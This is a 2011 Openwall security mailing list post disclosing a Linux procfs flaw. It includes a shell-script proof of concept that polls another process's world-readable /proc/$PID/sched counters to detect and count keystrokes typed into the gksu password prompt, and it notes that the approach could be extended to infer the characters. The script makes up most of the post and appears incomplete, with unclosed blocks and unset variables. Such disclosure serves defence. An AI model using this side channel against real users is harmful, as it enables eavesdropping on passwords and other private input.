Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 5 Nov 2011 14:47:36 +0400
From: Vasiliy Kulikov <>
Subject: /proc/$PID/sched PoC: spy-gksu

# A PoC for spying for keystrokes in gksu in Linux <= 3.1.
# /proc/$PID/{sched,schedstat} are world readable, so we can just loop
# on one CPU core while the victim is executed on another, and spy for
# the changes of scheduling counters.  The PoC counts only keystrokes number,
# but it can be easily extended to note the delays between the keystrokes
# and do the statistical analysis to learn the input characters.  See
# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
# It is NOT stable, it only shows a design flaw (the lack of proper
# permission model of procfs debugging counters).  The constants are true
# for the author's system only and don't take into account other sources of
# gksu CPU activity.
#   by segoon from openwall
# run as: spy-sched gksu


while :; do
    PID=`pgrep "$PNAME"`
    if [ -n "$PID" ]; then
        echo $PID
        cd /proc/$PID/
    sleep 1

while :; do
    V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-`
    [ -z "$V" ] && break
    if [ "$V" != "$S" ]; then
        VAL=`echo "$V - $S" | bc -l`
        VALI=`echo $VAL | cut -d. -f1`
        [ -z "$VALI" ] && VALI=0

        if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then
            # Cursor appeared
        elif [ $VALI -le 415 -a $VALI -ge 385 ]; then
            # Cursor disappeared
        elif [ $VALI -ge 150 ]; then
            echo "$VAL (KEY PRESSED)"
            echo "$VAL"


Vasiliy Kulikov - bringing security into open computing environments

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ